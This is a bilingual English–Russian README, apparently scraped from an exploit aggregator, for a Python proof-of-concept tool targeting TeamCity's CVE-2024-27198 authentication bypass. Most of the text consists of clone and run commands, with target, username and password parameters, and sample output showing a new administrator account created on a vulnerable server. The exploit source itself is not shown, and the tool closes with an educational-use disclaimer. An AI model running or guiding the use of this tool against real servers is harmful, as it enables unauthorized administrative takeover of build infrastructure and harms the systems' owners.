## https://sploitus.com/exploit?id=2D36AD73-00B5-5E82-8965-3F9A3CD9A9BC
# EN
**GenTeamCityExploit** is a PoC tool that targets a vulnerability in the TeamCity server (CVE-2024-27198). It enables the discovery of a TeamCity version and the creation of a new admin user by exploiting an authentication bypass flaw.
## Features
- Extracts the version of the TeamCity server.
- Checks for the presence of a known vulnerability (CVE-2024-27198).
- Creates a new administrator user if the server is vulnerable.
## Prerequisites
- **Python 3.6+**: Ensure you have Python installed.
- **Libraries**: Install the required libraries using:
```bash
pip install requests urllib3
```
## Usage
1. Clone the repository.
```bash
git clone https://github.com/geniuszly/CVE-2024-27198
```
2. Navigate to the directory.
```bash
cd CVE-2024-27198
```
3. Run the script with the required parameters.
```bash
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
```
**Parameters**:
- `-t`, `--target`: The URL of the target TeamCity server.
- `-u`, `--username`: The username for the new admin user.
- `-p`, `--password`: The password for the new admin user.
## Example
```bash
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
```
## Example output
```
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
```
In case the server is not vulnerable or the version is not found:
```
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
```
If there is an error connecting to the server:
```
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
```
## Disclaimer
This tool is intended for educational purposes only and should not be used on any systems without explicit permission from the owner. Unauthorized access to computer systems is illegal.
# RU
**GenTeamCityExploit** — это PoC-инструмент, нацеленный на уязвимость сервера TeamCity (CVE-2024-27198). Он позволяет обнаружить версию TeamCity и создать нового администратора, используя уязвимость обхода аутентификации.
## Возможности
- Извлекает версию сервера TeamCity.
- Проверяет наличие известной уязвимости (CVE-2024-27198).
- Создает нового пользователя-администратора, если сервер уязвим.
## Требования
- **Python 3.6+**: Убедитесь, что у вас установлен Python.
- **Библиотеки**: Установите необходимые библиотеки командой:
```bash
pip install requests urllib3
```
## Использование
1. Клонируйте репозиторий.
```bash
git clone https://github.com/geniuszly/CVE-2024-27198
```
2. Перейдите в папку с проектом.
```bash
cd CVE-2024-27198
```
3. Запустите скрипт с обязательными параметрами.
```bash
python3 GenTeamCityAdminCreator.py -t <target_url> -u <username> -p <password>
```
**Параметры**:
- `-t`, `--target`: URL целевого TeamCity сервера.
- `-u`, `--username`: Имя пользователя для нового администратора.
- `-p`, `--password`: Пароль для нового администратора.
## Пример
```bash
python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
```
## Пример вывода
```
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[+] Сервер уязвим! Возвращен HTTP код: 200
[+] Пользователь 'newadmin' создан успешно! Перейдите на http://target-teamcity.com/login.html для входа.
```
В случае, если сервер не уязвим или версия не найдена:
```
$ python3 GenTeamCityAdminCreator.py -t http://target-teamcity.com -u newadmin -p securepassword123
[+] Версия сервера обнаружена: TeamCity Professional 2023.1 (build 104124)
[-] Сервер, вероятно, неуязвим. Возвращен HTTP код: 403
```
При возникновении ошибки подключения к серверу:
```
$ python3 GenTeamCityAdminCreator.py -t http://nonexistent-url.com -u newadmin -p securepassword123
[-] Ошибка при попытке соединения с сервером: HTTPConnectionPool(host='nonexistent-url.com', port=80): Max retries exceeded with url: /login.html (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7ff9e1f07df0>: Failed to establish a new connection: [Errno -2] Name or service not known'))
```
## Отказ от ответственности
Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться на каких-либо системах без явного разрешения их владельца. Несанкционированный доступ к компьютерным системам является незаконным.